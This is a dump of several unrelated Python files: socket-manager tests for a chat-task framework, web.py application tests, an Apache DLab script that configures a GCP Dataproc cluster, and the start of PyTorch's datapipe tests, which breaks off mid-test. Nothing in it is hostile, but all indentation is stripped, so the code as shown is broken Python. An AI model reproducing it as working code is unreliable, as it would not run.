used_packet_json = self.socket_manager._safe_send.call_args[0][0]
used_packet_dict = json.loads(used_packet_json)
self.assertEqual(used_packet_dict['type'], data_model.MESSAGE_BATCH)
self.assertDictEqual(
used_packet_dict['content'], self.MESSAGE_SEND_PACKET_2.as_dict()
)
def test_simple_packet_channel_management(self):
"""
Ensure that channels are created, managed, and then removed as expected.
"""
use_packet = self.MESSAGE_SEND_PACKET_1
worker_id = use_packet.receiver_id
assignment_id = use_packet.assignment_id
# Open a channel and assert it is there
self.socket_manager.open_channel(worker_id, assignment_id)
time.sleep(0.1)
connection_id = use_packet.get_receiver_connection_id()
self.assertIn(connection_id, self.socket_manager.open_channels)
self.assertTrue(self.socket_manager.socket_is_open(connection_id))
self.assertFalse(self.socket_manager.socket_is_open(FAKE_ID))
# Send a packet to an open socket, ensure it got queued
resp = self.socket_manager.queue_packet(use_packet)
self.assertIn(use_packet.id, self.socket_manager.packet_map)
self.assertTrue(resp)
# Assert we can get the status of a packet in the map, but not
# existing doesn't throw an error
self.assertEqual(
self.socket_manager.get_status(use_packet.id), use_packet.status
)
self.assertEqual(self.socket_manager.get_status(FAKE_ID), Packet.STATUS_NONE)
# Assert that closing a thread does the correct cleanup work
self.socket_manager.close_channel(connection_id)
time.sleep(0.2)
self.assertNotIn(connection_id, self.socket_manager.open_channels)
self.assertNotIn(use_packet.id, self.socket_manager.packet_map)
# Assert that opening multiple and closing them is possible
self.socket_manager.open_channel(worker_id, assignment_id)
self.socket_manager.open_channel(worker_id + '2', assignment_id)
time.sleep(0.1)
self.assertEqual(len(self.socket_manager.open_channels), 2)
self.socket_manager.close_all_channels()
time.sleep(0.1)
self.assertEqual(len(self.socket_manager.open_channels), 0)
class TestSocketManagerMessageHandling(unittest.TestCase):
"""
Test sending messages to the world and then to each of two agents, along with
failure cases for each.
"""
def on_alive(self, packet):
self.alive_packet = packet
self.socket_manager.open_channel(packet.sender_id, packet.assignment_id)
def on_message(self, packet):
self.message_packet = packet
def on_worker_death(self, worker_id, assignment_id):
self.dead_worker_id = worker_id
self.dead_assignment_id = assignment_id
def on_server_death(self):
self.server_died = True
def assertEqualBy(self, val_func, val, max_time):
start_time = time.time()
while val_func() != val:
assert (
time.time() - start_time < max_time
), "Value was not attained in specified time"
time.sleep(0.1)
def setUp(self):
self.fake_socket = MockSocket()
time.sleep(0.3)
self.agent1 = MockAgent(
TEST_HIT_ID_1, TEST_ASSIGNMENT_ID_1, TEST_WORKER_ID_1, TASK_GROUP_ID_1
)
self.agent2 = MockAgent(
TEST_HIT_ID_2, TEST_ASSIGNMENT_ID_2, TEST_WORKER_ID_2, TASK_GROUP_ID_1
)
self.alive_packet = None
self.message_packet = None
self.dead_worker_id = None
self.dead_assignment_id = None
self.server_died = False
self.socket_manager = SocketManager(
'https://127.0.0.1',
3030,
self.on_alive,
self.on_message,
self.on_worker_death,
TASK_GROUP_ID_1,
1,
self.on_server_death,
)
def tearDown(self):
self.socket_manager.shutdown()
self.fake_socket.close()
def test_alive_send_and_disconnect(self):
message_packet = None
def on_msg(*args):
nonlocal message_packet
message_packet = args[0]
self.agent1.register_to_socket(self.fake_socket, on_msg)
self.assertIsNone(message_packet)
# Assert alive is registered
alive_id = self.agent1.send_alive()
self.assertIsNone(message_packet)
self.assertIsNone(self.message_packet)
self.assertEqualBy(lambda: self.alive_packet is None, False, 8)
self.assertEqual(self.alive_packet.id, alive_id)
# Test message send from agent
test_message_text_1 = 'test_message_text_1'
msg_id = self.agent1.send_message(test_message_text_1)
self.assertEqualBy(lambda: self.message_packet is None, False, 8)
self.assertEqual(self.message_packet.id, msg_id)
self.assertEqual(self.message_packet.data['text'], test_message_text_1)
# Test message send to agent
manager_message_id = 'message_id_from_manager'
test_message_text_2 = 'test_message_text_2'
message_send_packet = Packet(
manager_message_id,
data_model.MESSAGE_BATCH,
self.socket_manager.get_my_sender_id(),
TEST_WORKER_ID_1,
TEST_ASSIGNMENT_ID_1,
test_message_text_2,
't2',
)
self.socket_manager.queue_packet(message_send_packet)
self.assertEqualBy(lambda: message_packet is None, False, 8)
self.assertEqual(message_packet.id, manager_message_id)
self.assertEqual(message_packet.data, test_message_text_2)
self.assertIn(manager_message_id, self.socket_manager.packet_map)
# Test agent disconnect
self.agent1.send_disconnect()
self.assertEqualBy(lambda: self.dead_worker_id, TEST_WORKER_ID_1, 8)
self.assertEqual(self.dead_assignment_id, TEST_ASSIGNMENT_ID_1)
def test_one_agent_disconnect_other_alive(self):
message_packet = None
def on_msg(*args):
nonlocal message_packet
message_packet = args[0]
self.agent1.register_to_socket(self.fake_socket, on_msg)
self.agent2.register_to_socket(self.fake_socket, on_msg)
self.assertIsNone(message_packet)
# Assert alive is registered
self.agent1.send_alive()
self.agent2.send_alive()
self.assertIsNone(message_packet)
# Kill second agent
self.agent2.send_disconnect()
self.assertEqualBy(lambda: self.dead_worker_id, TEST_WORKER_ID_2, 8)
self.assertEqual(self.dead_assignment_id, TEST_ASSIGNMENT_ID_2)
# Run rest of tests
# Test message send from agent
test_message_text_1 = 'test_message_text_1'
msg_id = self.agent1.send_message(test_message_text_1)
self.assertEqualBy(lambda: self.message_packet is None, False, 8)
self.assertEqual(self.message_packet.id, msg_id)
self.assertEqual(self.message_packet.data['text'], test_message_text_1)
# Test message send to agent
manager_message_id = 'message_id_from_manager'
test_message_text_2 = 'test_message_text_2'
message_send_packet = Packet(
manager_message_id,
data_model.WORLD_MESSAGE,
self.socket_manager.get_my_sender_id(),
TEST_WORKER_ID_1,
TEST_ASSIGNMENT_ID_1,
test_message_text_2,
't2',
)
self.socket_manager.queue_packet(message_send_packet)
self.assertEqualBy(lambda: message_packet is None, False, 8)
self.assertEqual(message_packet.id, manager_message_id)
self.assertEqual(message_packet.data, test_message_text_2)
self.assertIn(manager_message_id, self.socket_manager.packet_map)
# Test agent disconnect
self.agent1.send_disconnect()
self.assertEqualBy(lambda: self.dead_worker_id, TEST_WORKER_ID_1, 8)
self.assertEqual(self.dead_assignment_id, TEST_ASSIGNMENT_ID_1)
if __name__ == '__main__':
unittest.main(buffer=True)
|
test_application.py
|
import os
import shutil
import sys
import threading
import time
import unittest
import web
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
data = """
import web
urls = ("/", "%(classname)s")
app = web.application(urls, globals(), autoreload=True)
class %(classname)s:
def GET(self):
return "%(output)s"
"""
urls = ("/iter", "do_iter")
app = web.application(urls, globals())
class do_iter:
def GET(self):
yield "hello, "
yield web.input(name="world").name
POST = GET
def write(filename, data):
f = open(filename, "w")
f.write(data)
f.close()
class ApplicationTest(unittest.TestCase):
def test_reloader(self):
write("foo.py", data % dict(classname="a", output="a"))
import foo
app = foo.app
self.assertEqual(app.request("/").data, b"a")
# test class change
time.sleep(1)
write("foo.py", data % dict(classname="a", output="b"))
self.assertEqual(app.request("/").data, b"b")
# test urls change
time.sleep(1)
write("foo.py", data % dict(classname="c", output="c"))
self.assertEqual(app.request("/").data, b"c")
def test_reloader_nested(self):
try:
shutil.rmtree("testpackage")
except OSError:
pass
os.mkdir("testpackage")
write("testpackage/__init__.py", "")
write("testpackage/bar.py", data % dict(classname="a", output="a"))
import testpackage.bar
app = testpackage.bar.app
self.assertEqual(app.request("/").data, b"a")
# test class change
time.sleep(1)
write("testpackage/bar.py", data % dict(classname="a", output="b"))
self.assertEqual(app.request("/").data, b"b")
# test urls change
time.sleep(1)
write("testpackage/bar.py", data % dict(classname="c", output="c"))
self.assertEqual(app.request("/").data, b"c")
def testUppercaseMethods(self):
urls = ("/", "hello")
app = web.application(urls, locals())
class hello:
def GET(self):
return "hello"
def internal(self):
return "secret"
response = app.request("/", method="internal")
self.assertEqual(response.status, "405 Method Not Allowed")
def testRedirect(self):
# fmt: off
urls = (
"/a", "redirect /hello/",
"/b/(.*)", r"redirect /hello/\1",
"/hello/(.*)", "hello"
)
# fmt: on
app = web.application(urls, locals())
class hello:
def GET(self, name):
name = name or "world"
return "hello " + name
response = app.request("/a")
self.assertEqual(response.status, "301 Moved Permanently")
self.assertEqual(response.headers["Location"], "http://0.0.0.0:8080/hello/")
response = app.request("/a?x=2")
self.assertEqual(response.status, "301 Moved Permanently")
self.assertEqual(response.headers["Location"], "http://0.0.0.0:8080/hello/?x=2")
response = app.request("/b/foo?x=2")
self.assertEqual(response.status, "301 Moved Permanently")
self.assertEqual(
response.headers["Location"], "http://0.0.0.0:8080/hello/foo?x=2"
)
def test_routing(self):
urls = ("/foo", "foo")
class foo:
def GET(self):
return "foo"
app = web.application(urls, {"foo": foo})
self.assertEqual(app.request("/foo\n").data, b"not found")
self.assertEqual(app.request("/foo").data, b"foo")
def test_subdirs(self):
urls = ("/(.*)", "blog")
class blog:
def GET(self, path):
return "blog " + path
app_blog = web.application(urls, locals())
# fmt: off
urls = (
"/blog", app_blog,
"/(.*)", "index"
)
# fmt: on
class index:
def GET(self, path):
return "hello " + path
app = web.application(urls, locals())
self.assertEqual(app.request("/blog/foo").data, b"blog foo")
self.assertEqual(app.request("/foo").data, b"hello foo")
def processor(handler):
return web.ctx.path + ":" + handler()
app.add_processor(processor)
self.assertEqual(app.request("/blog/foo").data, b"/blog/foo:blog foo")
def test_subdomains(self):
def create_app(name):
urls = ("/", "index")
class index:
def GET(self):
return name
return web.application(urls, locals())
# fmt: off
urls = (
"a.example.com", create_app('a'),
"b.example.com", create_app('b'),
".*.example.com", create_app('*')
)
# fmt: on
app = web.subdomain_application(urls, locals())
def test(host, expected_result):
result = app.request("/", host=host)
self.assertEqual(result.data, expected_result)
test("a.example.com", b"a")
test("b.example.com", b"b")
test("c.example.com", b"*")
test("d.example.com", b"*")
def test_redirect(self):
urls = ("/(.*)", "blog")
class blog:
def GET(self, path):
if path == "foo":
raise web.seeother("/login", absolute=True)
else:
raise web.seeother("/bar")
app_blog = web.application(urls, locals())
# fmt: off
urls = (
"/blog", app_blog,
"/(.*)", "index"
)
# fmt: on
class index:
def GET(self, path):
return "hello " + path
app = web.application(urls, locals())
response = app.request("/blog/foo")
self.assertEqual(response.headers["Location"], "http://0.0.0.0:8080/login")
response = app.request("/blog/foo", env={"SCRIPT_NAME": "/x"})
self.assertEqual(response.headers["Location"], "http://0.0.0.0:8080/x/login")
response = app.request("/blog/foo2")
self.assertEqual(response.headers["Location"], "http://0.0.0.0:8080/blog/bar")
response = app.request("/blog/foo2", env={"SCRIPT_NAME": "/x"})
self.assertEqual(response.headers["Location"], "http://0.0.0.0:8080/x/blog/bar")
def test_processors(self):
urls = ("/(.*)", "blog")
class blog:
def GET(self, path):
return "blog " + path
state = web.storage(x=0, y=0)
def f():
state.x += 1
app_blog = web.application(urls, locals())
app_blog.add_processor(web.loadhook(f))
# fmt: off
urls = (
"/blog", app_blog,
"/(.*)", "index"
)
# fmt: on
class index:
def GET(self, path):
return "hello " + path
app = web.application(urls, locals())
def g():
state.y += 1
app.add_processor(web.loadhook(g))
app.request("/blog/foo")
assert state.x == 1 and state.y == 1, repr(state)
app.request("/foo")
assert state.x == 1 and state.y == 2, repr(state)
def testUnicodeInput(self):
urls = ("(/.*)", "foo")
class foo:
def GET(self, path):
i = web.input(name="")
return repr(i.name)
def POST(self, path):
if path == "/multipart":
i = web.input(file={})
return i.file.value
else:
i = web.input()
return repr(dict(i)).replace("u", "")
app = web.application(urls, locals())
def f(name):
path = "/?" + urlencode({"name": name.encode("utf-8")})
self.assertEqual(app.request(path).data.decode("utf-8"), repr(name))
f(u"\u1234")
f(u"foo")
response = app.request("/", method="POST", data=dict(name="foo"))
self.assertEqual(response.data, b"{'name': 'foo'}")
data = '--boundary\r\nContent-Disposition: form-data; name="x"\r\n\r\nfoo\r\n--boundary\r\nContent-Disposition: form-data; name="file"; filename="a.txt"\r\nContent-Type: text/plain\r\n\r\na\r\n--boundary--\r\n'
headers = {"Content-Type": "multipart/form-data; boundary=boundary"}
response = app.request("/multipart", method="POST", data=data, headers=headers)
self.assertEqual(response.data, b"a")
def testCustomNotFound(self):
urls_a = ("/", "a")
urls_b = ("/", "b")
app_a = web.application(urls_a, locals())
app_b = web.application(urls_b, locals())
app_a.notfound = lambda: web.HTTPError("404 Not Found", {}, "not found 1")
# fmt: off
urls = (
"/a", app_a,
"/b", app_b
)
# fmt: on
app = web.application(urls, locals())
def assert_notfound(path, message):
response = app.request(path)
self.assertEqual(response.status.split()[0], "404")
self.assertEqual(response.data, message)
assert_notfound("/a/foo", b"not found 1")
assert_notfound("/b/foo", b"not found")
app.notfound = lambda: web.HTTPError("404 Not Found", {}, "not found 2")
assert_notfound("/a/foo", b"not found 1")
assert_notfound("/b/foo", b"not found 2")
def testIter(self):
self.assertEqual(app.request("/iter").data, b"hello, world")
self.assertEqual(app.request("/iter?name=web").data, b"hello, web")
self.assertEqual(app.request("/iter", method="POST").data, b"hello, world")
self.assertEqual(
app.request("/iter", method="POST", data="name=web").data, b"hello, web"
)
def testUnload(self):
x = web.storage(a=0)
# fmt: off
urls = (
"/foo", "foo",
"/bar", "bar"
)
# fmt: on
class foo:
def GET(self):
return "foo"
class bar:
def GET(self):
raise web.notfound()
app = web.application(urls, locals())
def unload():
x.a += 1
app.add_processor(web.unloadhook(unload))
app.request("/foo")
self.assertEqual(x.a, 1)
app.request("/bar")
self.assertEqual(x.a, 2)
def test_changequery(self):
urls = ("/", "index")
class index:
def GET(self):
return web.changequery(x=1)
app = web.application(urls, locals())
def f(path):
return app.request(path).data
self.assertEqual(f("/?x=2"), b"/?x=1")
p = f("/?y=1&y=2&x=2")
self.assertTrue(p == b"/?y=1&y=2&x=1" or p == b"/?x=1&y=1&y=2")
def test_setcookie(self):
urls = ("/", "index")
class index:
def GET(self):
web.setcookie("foo", "bar")
return "hello"
app = web.application(urls, locals())
def f(script_name=""):
response = app.request("/", env={"SCRIPT_NAME": script_name})
return response.headers["Set-Cookie"]
self.assertEqual(f(""), "foo=bar; Path=/")
self.assertEqual(f("/admin"), "foo=bar; Path=/admin/")
def test_stopsimpleserver(self):
urls = ("/", "index")
class index:
def GET(self):
pass
# reset command-line arguments
sys.argv = ["code.py"]
app = web.application(urls, locals())
thread = threading.Thread(target=app.run)
thread.start()
time.sleep(1)
self.assertTrue(thread.is_alive())
app.stop()
thread.join(timeout=1)
self.assertFalse(thread.is_alive())
|
dataengine-service_configure.py
|
#!/usr/bin/python
# *****************************************************************************
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# ******************************************************************************
import json
import time
from fabric.api import *
from dlab.fab import *
from dlab.meta_lib import *
from dlab.actions_lib import *
from dlab.notebook_lib import *
import sys
import os
import logging
import multiprocessing
def configure_dataengine_service(instance, dataproc_conf):
dataproc_conf['instance_ip'] = meta_lib.GCPMeta().get_private_ip_address(instance)
# configuring proxy on Data Engine service
try:
logging.info('[CONFIGURE PROXY ON DATAENGINE SERVICE]')
print('[CONFIGURE PROXY ON DATAENGINE SERVICE]')
additional_config = {"proxy_host": dataproc_conf['edge_instance_name'], "proxy_port": "3128"}
params = "--hostname {} --instance_name {} --keyfile {} --additional_config '{}' --os_user {}"\
.format(dataproc_conf['instance_ip'], dataproc_conf['cluster_name'], dataproc_conf['key_path'],
json.dumps(additional_config), dataproc_conf['dlab_ssh_user'])
try:
local("~/scripts/{}.py {}".format('common_configure_proxy', params))
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to configure proxy.", str(err))
actions_lib.GCPActions().delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
sys.exit(1)
try:
logging.info('[CONFIGURE DATAENGINE SERVICE]')
print('[CONFIGURE DATAENGINE SERVICE]')
try:
env['connection_attempts'] = 100
env.key_filename = "{}".format(dataproc_conf['key_path'])
env.host_string = dataproc_conf['dlab_ssh_user'] + '@' + dataproc_conf['instance_ip']
install_os_pkg(['python-pip', 'python3-pip'])
configure_data_engine_service_pip(dataproc_conf['instance_ip'], dataproc_conf['dlab_ssh_user'],
dataproc_conf['key_path'])
except:
traceback.print_exc()
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to configure dataengine service.", str(err))
actions_lib.GCPActions().delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
sys.exit(1)
try:
print('[SETUP EDGE REVERSE PROXY TEMPLATE]')
logging.info('[SETUP EDGE REVERSE PROXY TEMPLATE]')
slaves = []
for idx, instance in enumerate(dataproc_conf['cluster_core_instances']):
slave_ip = meta_lib.GCPMeta().get_private_ip_address(instance)
slave = {
'name': 'datanode{}'.format(idx + 1),
'ip': slave_ip,
'dns': "{0}.c.{1}.internal".format(instance, os.environ['gcp_project_id'])
}
slaves.append(slave)
additional_info = {
"computational_name": dataproc_conf['computational_name'],
"master_ip": dataproc_conf['master_ip'],
"master_dns": "{0}.c.{1}.internal".format(dataproc_conf['master_name'], os.environ['gcp_project_id']),
"slaves": slaves,
"tensor": False
}
params = "--edge_hostname {} " \
"--keyfile {} " \
"--os_user {} " \
"--type {} " \
"--exploratory_name {} " \
"--additional_info '{}'"\
.format(dataproc_conf['edge_instance_hostname'],
dataproc_conf['key_path'],
dataproc_conf['dlab_ssh_user'],
'dataengine-service',
dataproc_conf['exploratory_name'],
json.dumps(additional_info))
try:
local("~/scripts/{}.py {}".format('common_configure_reverse_proxy', params))
except:
append_result("Failed edge reverse proxy template")
raise Exception
except Exception as err:
print('Error: {0}'.format(err))
append_result("Failed to configure reverse proxy.", str(err))
actions_lib.GCPActions().delete_dataproc_cluster(dataproc_conf['cluster_name'], os.environ['gcp_region'])
sys.exit(1)
if __name__ == "__main__":
local_log_filename = "{}_{}_{}.log".format(os.environ['conf_resource'], os.environ['project_name'],
os.environ['request_id'])
local_log_filepath = "/logs/" + os.environ['conf_resource'] + "/" + local_log_filename
logging.basicConfig(format='%(levelname)-8s [%(asctime)s] %(message)s',
level=logging.INFO,
filename=local_log_filepath)
print('Generating infrastructure names and tags')
dataproc_conf = dict()
try:
dataproc_conf['exploratory_name'] = (os.environ['exploratory_name']).lower().replace('_', '-')
except:
dataproc_conf['exploratory_name'] = ''
try:
dataproc_conf['computational_name'] = (os.environ['computational_name']).lower().replace('_', '-')
except:
dataproc_conf['computational_name'] = ''
dataproc_conf['service_base_name'] = (os.environ['conf_service_base_name']).lower().replace('_', '-')
dataproc_conf['edge_user_name'] = (os.environ['edge_user_name']).lower().replace('_', '-')
dataproc_conf['project_name'] = (os.environ['project_name']).lower().replace('_', '-')
dataproc_conf['endpoint_name'] = (os.environ['endpoint_name']).lower().replace('_', '-')
dataproc_conf['key_name'] = os.environ['conf_key_name']
dataproc_conf['key_path'] = '{0}{1}.pem'.format(os.environ['conf_key_dir'], os.environ['conf_key_name'])
dataproc_conf['region'] = os.environ['gcp_region']
dataproc_conf['zone'] = os.environ['gcp_zone']
dataproc_conf['subnet'] = '{0}-{1}-subnet'.format(dataproc_conf['service_base_name'],
dataproc_conf['project_name'])
dataproc_conf['cluster_name'] = '{0}-{1}-des-{2}-{3}'.format(dataproc_conf['service_base_name'],
dataproc_conf['project_name'],
dataproc_conf['exploratory_name'],
dataproc_conf['computational_name'])
dataproc_conf['cluster_tag'] = '{0}-{1}-ps'.format(dataproc_conf['service_base_name'],
dataproc_conf['project_name'])
dataproc_conf['bucket_name'] = '{0}-{1}-{2}-bucket'.format(dataproc_conf['service_base_name'],
dataproc_conf['project_name'],
dataproc_conf['endpoint_name'])
dataproc_conf['release_label'] = os.environ['dataproc_version']
dataproc_conf['cluster_label'] = {os.environ['notebook_instance_name']: "not-configured"}
dataproc_conf['dataproc_service_account_name'] = '{0}-{1}-ps'.format(dataproc_conf['service_base_name'],
dataproc_conf['project_name'])
service_account_email = "{}@{}.iam.gserviceaccount.com".format(dataproc_conf['dataproc_service_account_name'],
os.environ['gcp_project_id'])
dataproc_conf['edge_instance_name'] = '{0}-{1}-{2}-edge'.format(dataproc_conf['service_base_name'],
dataproc_conf['project_name'],
dataproc_conf['endpoint_name'])
dataproc_conf['edge_instance_hostname'] = GCPMeta().get_instance_public_ip_by_name(
dataproc_conf['edge_instance_name'])
dataproc_conf['dlab_ssh_user'] = os.environ['conf_os_user']
dataproc_conf['master_name'] = dataproc_conf['cluster_name'] + '-m'
dataproc_conf['master_ip'] = meta_lib.GCPMeta().get_private_ip_address(dataproc_conf['master_name'])
try:
res = meta_lib.GCPMeta().get_list_instances(os.environ['gcp_zone'], dataproc_conf['cluster_name'])
dataproc_conf['cluster_instances'] = [i.get('name') for i in res['items']]
except Exception as err:
traceback.print_exc()
raise Exception
dataproc_conf['cluster_core_instances'] = list()
for instance in dataproc_conf['cluster_instances']:
if "{}-w-".format(dataproc_conf['cluster_name']) in instance:
dataproc_conf['cluster_core_instances'].append(instance)
try:
jobs = []
for instance in dataproc_conf['cluster_instances']:
p = multiprocessing.Process(target=configure_dataengine_service, args=(instance, dataproc_conf))
jobs.append(p)
p.start()
for job in jobs:
job.join()
for job in jobs:
if job.exitcode != 0:
raise Exception
except:
traceback.print_exc()
raise Exception
try:
dataproc_master_acces_url = "http://" + dataproc_conf['edge_instance_hostname'] + "/{}/".format(
dataproc_conf['exploratory_name'] + '_' + dataproc_conf['computational_name'])
logging.info('[SUMMARY]')
print('[SUMMARY]')
print("Service base name: {}".format(dataproc_conf['service_base_name']))
print("Cluster name: {}".format(dataproc_conf['cluster_name']))
print("Key name: {}".format(dataproc_conf['key_name']))
print("Region: {}".format(dataproc_conf['region']))
print("Zone: {}".format(dataproc_conf['zone']))
print("Subnet: {}".format(dataproc_conf['subnet']))
print("Dataproc version: {}".format(dataproc_conf['release_label']))
print("Dataproc master node shape: {}".format(os.environ['dataproc_master_instance_type']))
print("Dataproc slave node shape: {}".format(os.environ['dataproc_slave_instance_type']))
print("Master count: {}".format(os.environ['dataproc_master_count']))
print("Slave count: {}".format(os.environ['dataproc_slave_count']))
print("Preemptible count: {}".format(os.environ['dataproc_preemptible_count']))
print("Notebook hostname: {}".format(os.environ['notebook_instance_name']))
print("Bucket name: {}".format(dataproc_conf['bucket_name']))
with open("/root/result.json", 'w') as result:
res = {"hostname": dataproc_conf['cluster_name'],
"key_name": dataproc_conf['key_name'],
"instance_id": dataproc_conf['cluster_name'],
"user_own_bucket_name": dataproc_conf['bucket_name'],
"Action": "Create new Dataproc cluster",
"computational_url": [
{"description": "Dataproc Master",
"url": dataproc_master_acces_url}
]
}
print(json.dumps(res))
result.write(json.dumps(res))
except:
print("Failed writing results.")
sys.exit(1)
|
test_datapipe.py
|
# Owner(s): ["module: dataloader"]
import copy
import http.server
import itertools
import os
import os.path
import pickle
import random
import socketserver
import sys
import tarfile
import tempfile
import threading
import time
import unittest
import warnings
import zipfile
from functools import partial
from typing import (
Any,
Awaitable,
Dict,
Generic,
Iterator,
List,
NamedTuple,
Optional,
Set,
Tuple,
Type,
TypeVar,
Union,
)
from unittest import skipIf
import numpy as np
import torch
import torch.utils.data.backward_compatibility
import torch.utils.data.datapipes as dp
import torch.utils.data.graph
import torch.utils.data.sharding
from torch.testing._internal.common_utils import TestCase, run_tests, suppress_warnings
from torch.utils.data import (
DataLoader,
DataChunk,
IterDataPipe,
MapDataPipe,
RandomSampler,
argument_validation,
runtime_validation,
runtime_validation_disabled,
)
from torch.utils.data.graph import traverse
from torch.utils.data.datapipes.utils.decoder import (
basichandlers as decoder_basichandlers,
)
try:
import dill
# XXX: By default, dill writes the Pickler dispatch table to inject its
# own logic there. This globally affects the behavior of the standard library
# pickler for any user who transitively depends on this module!
# Undo this extension to avoid altering the behavior of the pickler globally.
dill.extend(use_dill=False)
HAS_DILL = True
except ImportError:
HAS_DILL = False
skipIfNoDill = skipIf(not HAS_DILL, "no dill")
try:
import pandas # type: ignore[import] # noqa: F401 F403
HAS_PANDAS = True
except ImportError:
HAS_PANDAS = False
skipIfNoDataFrames = skipIf(not HAS_PANDAS, "no dataframes (pandas)")
T_co = TypeVar("T_co", covariant=True)
def create_temp_dir_and_files():
# The temp dir and files within it will be released and deleted in tearDown().
# Adding `noqa: P201` to avoid mypy's warning on not releasing the dir handle within this function.
temp_dir = tempfile.TemporaryDirectory() # noqa: P201
temp_dir_path = temp_dir.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.txt') as f:
temp_file1_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.byte') as f:
temp_file2_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_dir_path, delete=False, suffix='.empty') as f:
temp_file3_name = f.name
with open(temp_file1_name, 'w') as f1:
f1.write('0123456789abcdef')
with open(temp_file2_name, 'wb') as f2:
f2.write(b"0123456789abcdef")
temp_sub_dir = tempfile.TemporaryDirectory(dir=temp_dir_path) # noqa: P201
temp_sub_dir_path = temp_sub_dir.name
with tempfile.NamedTemporaryFile(dir=temp_sub_dir_path, delete=False, suffix='.txt') as f:
temp_sub_file1_name = f.name
with tempfile.NamedTemporaryFile(dir=temp_sub_dir_path, delete=False, suffix='.byte') as f:
temp_sub_file2_name = f.name
with open(temp_sub_file1_name, 'w') as f1:
f1.write('0123456789abcdef')
with open(temp_sub_file2_name, 'wb') as f2:
f2.write(b"0123456789abcdef")
return [(temp_dir, temp_file1_name, temp_file2_name, temp_file3_name),
(temp_sub_dir, temp_sub_file1_name, temp_sub_file2_name)]
# Given a DataPipe and integer n, iterate the DataPipe for n elements and store the elements into a list
# Then, reset the DataPipe and return a tuple of two lists
# 1. A list of elements yielded before the reset
# 2. A list of all elements of the DataPipe after the reset
def reset_after_n_next_calls(datapipe: Union[IterDataPipe[T_co], MapDataPipe[T_co]],
n: int) -> Tuple[List[T_co], List[T_co]]:
it = iter(datapipe)
res_before_reset = []
for _ in range(n):
res_before_reset.append(next(it))
return res_before_reset, list(datapipe)
def odd_or_even(x: int) -> int:
return x % 2
class TestDataChunk(TestCase):
def setUp(self):
self.elements = list(range(10))
random.shuffle(self.elements)
self.chunk: DataChunk[int] = DataChunk(self.elements)
def test_getitem(self):
for i in range(10):
self.assertEqual(self.elements[i], self.chunk[i])
def test_iter(self):
for ele, dc in zip(self.elements, iter(self.chunk)):
self.assertEqual(ele, dc)
def test_len(self):
self.assertEqual(len(self.elements), len(self.chunk))
def test_as_string(self):
self.assertEqual(str(self.chunk), str(self.elements))
batch = [self.elements] * 3
chunks: List[DataChunk[int]] = [DataChunk(self.elements)] * 3
self.assertEqual(str(batch), str(chunks))
def test_sort(self):
chunk: DataChunk[int] = DataChunk(self.elements)
chunk.sort()
self.assertTrue(isinstance(chunk, DataChunk))
for i, d in enumerate(chunk):
self.assertEqual(i, d)
def test_reverse(self):
chunk: DataChunk[int] = DataChunk(self.elements)
chunk.reverse()
self.assertTrue(isinstance(chunk, DataChunk))
for i in range(10):
self.assertEqual(chunk[i], self.elements[9 - i])
def test_random_shuffle(self):
elements = list(range(10))
chunk: DataChunk[int] = DataChunk(elements)
rng = random.Random(0)
rng.shuffle(chunk)
rng = random.Random(0)
rng.shuffle(elements)
self.assertEqual(chunk, elements)
class TestIterableDataPipeBasic(TestCase):
def setUp(self):
ret = create_temp_dir_and_files()
self.temp_dir = ret[0][0]
self.temp_files = ret[0][1:]
self.temp_sub_dir = ret[1][0]
self.temp_sub_files = ret[1][1:]
def tearDown(self):
try:
self.temp_sub_dir.cleanup()
self.temp_dir.cleanup()
except Exception as e:
warnings.warn("TestIterableDatasetBasic was not able to cleanup temp dir due to {}".format(str(e)))
def test_listdirfiles_iterable_datapipe(self):
temp_dir = self.temp_dir.name
datapipe = dp.iter.FileLister(temp_dir, '')
count = 0
for pathname in datapipe:
count = count + 1
self.assertTrue(pathname in self.temp_files)
self.assertEqual(count, len(self.temp_files))
count = 0
datapipe = dp.iter.FileLister(temp_dir, '', recursive=True)
for pathname in datapipe:
count = count + 1
self.assertTrue((pathname in self.temp_files) or (pathname in self.temp_sub_files))
self.assertEqual(count, len(self.temp_files) + len(self.temp_sub_files))
def test_loadfilesfromdisk_iterable_datapipe(self):
# test import datapipe class directly
from torch.utils.data.datapipes.iter import (
FileLister,
FileLoader,
)
temp_dir = self.temp_dir.name
datapipe1 = FileLister(temp_dir, '')
datapipe2 = FileLoader(datapipe1)
count = 0
for rec in datapipe2:
count = count + 1
self.assertTrue(rec[0] in self.temp_files)
with open(rec[0], 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
self.assertEqual(count, len(self.temp_files))
def test_readfilesfromtar_iterable_datapipe(self):
temp_dir = self.temp_dir.name
temp_tarfile_pathname = os.path.join(temp_dir, "test_tar.tar")
with tarfile.open(temp_tarfile_pathname, "w:gz") as tar:
tar.add(self.temp_files[0])
tar.add(self.temp_files[1])
tar.add(self.temp_files[2])
datapipe1 = dp.iter.FileLister(temp_dir, '*.tar')
datapipe2 = dp.iter.FileLoader(datapipe1)
datapipe3 = dp.iter.TarArchiveReader(datapipe2)
# Test Case: Read extracted files before reaching the end of the tarfile
for rec, temp_file in itertools.zip_longest(datapipe3, self.temp_files):
self.assertTrue(rec is not None and temp_file is not None)
self.assertEqual(os.path.basename(rec[0]), os.path.basename(temp_file))
with open(temp_file, 'rb') as f:
self.assertEqual(rec[1].read(), f.read())
rec[1].close()
# Test Case: Read extracted files after reaching the end of the tarfile
data_refs = list(datapipe3)
